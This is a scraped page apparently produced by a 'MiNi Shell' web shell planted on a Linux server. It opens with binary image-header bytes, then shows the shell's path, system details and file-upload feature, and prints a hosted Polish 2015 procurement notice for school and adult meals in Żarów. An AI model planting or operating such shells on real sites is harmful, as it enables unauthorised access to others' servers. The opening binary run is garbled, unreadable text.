JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/313846-N-2015.html

<p class="kh_header"><b>Żarów: Dożywianie uczniów szkół i dorosłych mieszkańców z terenu Gminy Żarów w roku 2016</b><br>
<b>Numer ogłoszenia: 313846 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Armii Krajowej 54, 58-130 Żarów, woj. dolnośląskie, tel. 74 85 80 745, faks 74 85 80 745.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.gmina.zarow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie uczniów szkół i dorosłych mieszkańców z terenu Gminy Żarów w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dożywianie uczniów szkół i dorosłych mieszkańców z terenu Gminy Żarów w roku 2016 Przedmiotem zamówienia jest dożywianie około 100 uczniów oraz około 50 dorosłych mieszkańców na terenie miasta i gminy Żarów w okresie od  01.01.2016 r.  do 31.12.2016 r. Zakres zamówienia obejmuje:przygotowanie posiłków dwudaniowych dla dzieci ze szkoły podstawowej i szkoły gimnazjalnej na terenie miasta Żarów (zupa z wkładką, drugie danie kompot)  wydawanych od poniedziałku do piątku, zupa z wkładką 250 ml, ziemniaki lub zamiennik ryż, kasza 200 g, mięso 80 g, surówka 150 g, kompot 200 ml) przygotowanie posiłków dwudaniowych dla uczniów szkoły ponadgimnazjalnej na terenie miasta Żarów (zupa z wkładką pieczywo, drugie danie kompot)  wydawanych od poniedziałku do piątku w dni nauki szkolnej (zupa z wkładką 350 ml, pieczywo 100g, ziemniaki lub zamiennik ryż, kasza 350 g,mięso 120 g, surówka 200 g, kompot 200 ml)  przygotowanie posiłków dwudaniowych dla dorosłych na terenie miasta Żarów (zupa z wkładką pieczywo, drugie danie kompot) wydawanych od poniedziałku do piątku z wyłączeniem świąt oraz okresu wakacyjnego (zupa z wkładką  350 ml, pieczywo 100g, ziemniaki lub zamiennik ryż, kasza 350 g,mięso 120 g, surówka 200 g, kompot 200 ml)  przygotowanie posiłków dwudaniowych dla dzieci oraz dorosłych (zupa z wkładką, drugie danie kompot) i dostarczenie w formie cateringu posiłków na teren wiejski od poniedziałku do piątku z wyłączeniem świąt oraz okresu wakacyjnego. Gramatura jak wyżej dla dorosłych i dzieci. przygotowanie ciepłego jednodaniowego posiłku (ze wskazaniem dania drugiego) i dostarczenie w formie cateringu posiłków dla dzieci wiejskich oraz dla dorosłych mieszkańców Gminy Żarów od poniedziałku do piątku z wyłączeniem świąt oraz okresu wakacyjnego. Gramatura jak wyżej dla dorosłych i dzieci. przygotowanie jednodaniowego ciepłego posiłku ze wskazaniem na zupę z wkładką, oraz z pieczywem dla osoby dorosłej od poniedziałku do piątku z wyłączeniem świąt oraz okresu wakacyjnego, przygotowanie jednodaniowego ciepłego posiłku ze wskazaniem na drugie danie dla osoby dorosłej  od poniedziałku do piątku z wyłączeniem świąt oraz okresu wakacyjnego.
Dożywianie dzieci w: szkołach podstawowych (w tym na terenach wiejskich Mrowiny, Imbramowice, Zastruże) szkoła podstawowa w Żarowie ul. Armii Krajowej   tel: 74   8580 482 szkoła podstawowa w Imbramowicach ul. Żarowska 45   tel :74 8507 314     szkoła podstawowa w Zastrużu, Zastruże 19 A   tel 74 8580 808 szkoła podstawowa w Mrowinach ul. Wojska Polskiego 43 tel 74 8580  575 gimnazjum w Żarowie ul. Piastowska 10 tel 74  8580 224 szkoła ponadgimnazjalna w Żarowie ul. Zamkowa 10  tel. 74 8580 403 Dożywianie dorosłych mieszkańców gminy Żarów w stołówkach, jadłodajniach lub w formie cateringu Wymagana gramatura dla dzieci zupa z wkładką 250 ml, ziemniaki lub zamiennik ryż, kasza 200 g, mięso 80 g, surówka 150 g, kompot 200 ml Wymagana gramatura dla dorosłych zupa z wkładką 350 ml, pieczywo100 g, ziemniaki lub zamiennik ryż, kasza350 g, mięso 120 g, surówka 200 g, kompot 200 ml. Za wkładkę do zupy uważa się sztukę mięsa lub kiełbasę. Liczba dzieci oraz dorosłych mieszkańców gminy Żarów w ciągu roku może ulec zmianie i wynikać będzie z wydanych decyzji administracyjnych dożywiania. Posiłki muszą być sporządzane z produktów świeżych, wyklucza się mięso i przetwory z puszek konserwowych. Ponadto wymagania zdrowotne żywności oraz wymagania dotyczące przestrzegania zasad higieny winny być stosowane zgodnie z ustawą z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia oraz obowiązującymi w tym zakresie przepisami prawa. Posiłki powinny być sporządzane i wydane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Powinny być przygotowywane z uwzględnieniem norm żywieniowych o wysokiej wartości odżywczej min. 1000 kcla. Należy unikać częstego powtarzania tych samych potraw. Wykonawca 1 raz w miesiącu winien dostarczać jadłospis wydawanych posiłków do siedziby Ośrodka Pomocy Społecznej w Żarowie.  Ponadto posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy ważności. Posiłki powinny być przewożone w termosach gastronomicznych zapewniających utrzymanie temperatury spożywania potraw oraz posiadających odpowiednie atesty Państwowego Zakładu Higieny. Posiłki wykonawca dostarczać będzie własnym transportem w specjalistycznych termosach, naczyniach, pojemnikach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw. Posiłki powinny być przewożone samochodem dostawczym dopuszczonym przez SANEPID do przewozu posiłków. Posiłki powinny być przygotowywane metodami tradycyjnymi  (bez użycia konserwantów, zagęszczaczy, półproduktów sypkich), z zachowaniem wartości odżywczych zgodnie z ustawą z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia  (Dz. U. Z 2010 nr 136, poz. 914 ze zmianami). Przygotowywane będą posiłki dietetyczne zawierające środki spożywcze specjalnego przeznaczenia medycznego w ramach zalecanych diet. Cena posiłków winna zawierać również koszt dowozu posiłków do placówek oraz koszt naczyń i sztućców. Dostawca zadba o wydanie, asystowanie podczas konsumpcji posiłków oraz o czystość pomieszczeń w których wydawane i spożywane będą posiłki. Zamawiający nie ponosi konsekwencji za zmniejszającą się liczbę osób dożywianych, która zależna będzie od spełnienia określonych przepisami prawa kryteriów umożliwiających udzielenie pomocy w formie dożywiania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy Spełniają warunki udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące Posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia Posiadania wiedzy i doświadczenia do wykonania zamówienia Warunek ten zostanie spełniony dla Części1 Części 2 lub Części 3 jeżeli wykonawca wykaże się wykonaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednego zamówienia o podobnej złożoności i wartości, jak w niniejszym zamówieniu, Zamawiający za podobne będzie rozumiał takie, których przedmiotem było wykonanie usługi o podobnej złożoności rozumie usługi dotyczące przygotowania posiłków usługi o podobnej wartości rozumie usługi o wartości nie mniejszej niż 30.000,00 zł brutto (słownie: trzydzieści tysięcy złotych), w przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na PLN według średniego kursu ogłoszonego przez NBP na dzień otwarcia oferty Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,Warunek ten zostanie spełniony dla Części 1,Części 2 lub Części 3 jeżeli wykonawca wykaże się, że posiada postanowienie Powiatowego Inspektora Sanitarnego dotyczące transportu żywności posiłki wydawane będą na terenie Miasta Żarów w pomieszczeniu w szkole przystosowanym dla minimum 30 osób uniemożliwiającym identyfikację dzieci z pomocy społecznej.W przypadku gdy podmiot przygotowuje posiłki dla uczniów ze szkoły podstawowej poza Szkołą Podstawową w Żarowie podmiot winien dostarczyć posiłki do Szkoły Podstawowej w Żarowie, zapewniając przy tym odpowiednie pomieszczenie w szkole, o którym mowa powyżej oraz odpowiednie warunki spożywania posiłków 21.2Nie podlegają wykluczeniu z przedmiotowego postępowania na podstawie art 24 ustawy z dnia 29 stycznia 2004 r Prawo zamówień publicznych21.3.Nie podlegają wykluczeniu z przedmiotowego postępowania na podstawie art.24 ust2 pkt5 ustawy z dnia 29 stycznia 2004 r Prawo zamówień publicznych21.4.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu wg formuły spełnia/nie spełnia na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę wraz z ofertą Nie spełnienie któregokolwiek z powyższych warunków spowoduje wykluczenie Wykonawcy z postępowania a jego oferta zostanie uznana za odrzuconą21.5.Zamawiający żąda aby Wykonawca wykazał spełnienie warunków udziału w postępowaniu i braku podstaw do wykluczenia nie później niż na dzień składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają sytuację ekonomiczną i finansową zapewniającą wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie dotyczące przygotowywania posiłków zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i życiwnia (DZ.U. z 2010 r. nr 136, poz. 914 ze zm.) - załącznik do SWIZ. Pisemne oświadczenie dotyczące pomieszczenia załącznik nr 5 do SWIZ Wykaz wykonanych usług wraz z załączeniem dowodów potwierdzających prawidłowe wykonanie najważniejszych usług załącznik nr 6 do SWIZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.gmina.zarow.pl, www.um.zarow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej ul. Armii Krajowej 54 58-130 Żarów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2015 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul. Armii Krajowej 54 58-130 Żarów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dożywianie dzieci na terenie Miasta Żarów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie  posiłku dwudaniowego dla dzieci ze szkół podstawowych i młodzieży gimnazjalnej (zupa z wkładką, drugie danie kompot) Przygotowanie posiłku dwudaniowego dla młodzieży szkoły ponadgimnazjalnej (zupa z wkładką, drugie danie kompot)Posiłki wydawane będą na terenie Miasta Żarów w pomieszczeniu w szkole przystosowanym dla minimum 30 osób uniemożliwiającym identyfikację dzieci z pomocy społecznej. W przypadku gdy podmiot przygotowuje posiłki dla uczniów ze szkoły podstawowej poza Szkołą Podstawową w Żarowie podmiot winien dostarczyć posiłki do Szkoły Podstawowej w Żarowie, zapewniając przy tym odpowiednie pomieszczenie w szkole, o którym mowa powyżej oraz odpowiednie warunki spożywania posiłków.
Za wkładkę do zupy uważa się sztukę mięsa lub kiełbasę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dożywianie dorosłych na terenie Miasta Żarów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie  posiłku dwudaniowego dla dorosłych ( zupa z wkładką + pieczywo, drugie danie + kompot ) Przygotowanie posiłku ciepłego jednodaniowego ze wskazaniem na zupę z wkładką  wraz z pieczywem dla dorosłych Przygotowanie  posiłku ciepłego jednodaniowego ze wskazaniem na drugie danie dla dorosłych Za wkładkę do zupy uważa się sztukę mięsa lub kiełbasę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dożywianie dorosłych i dzieci  cateringowo na terenie Gminy Żarów (teren wiejski) dzieci 10 dorosłych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie  posiłku dwudaniowego dla dzieci ( zupa z wkładką, drugie danie + kompot ) ( catering ) Przygotowanie  posiłku dwudaniowego dla dorosłych ( zupa z wkładką, drugie danie + kompot ) ( catering ) Przygotowanie  posiłku ciepłego jednodaniowego ze wskazaniem na drugie danie dla dorosłych ( catering )Przygotowanie  posiłku ciepłego jednodaniowego ze wskazaniem na danie drugie dla dzieci ( catering ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com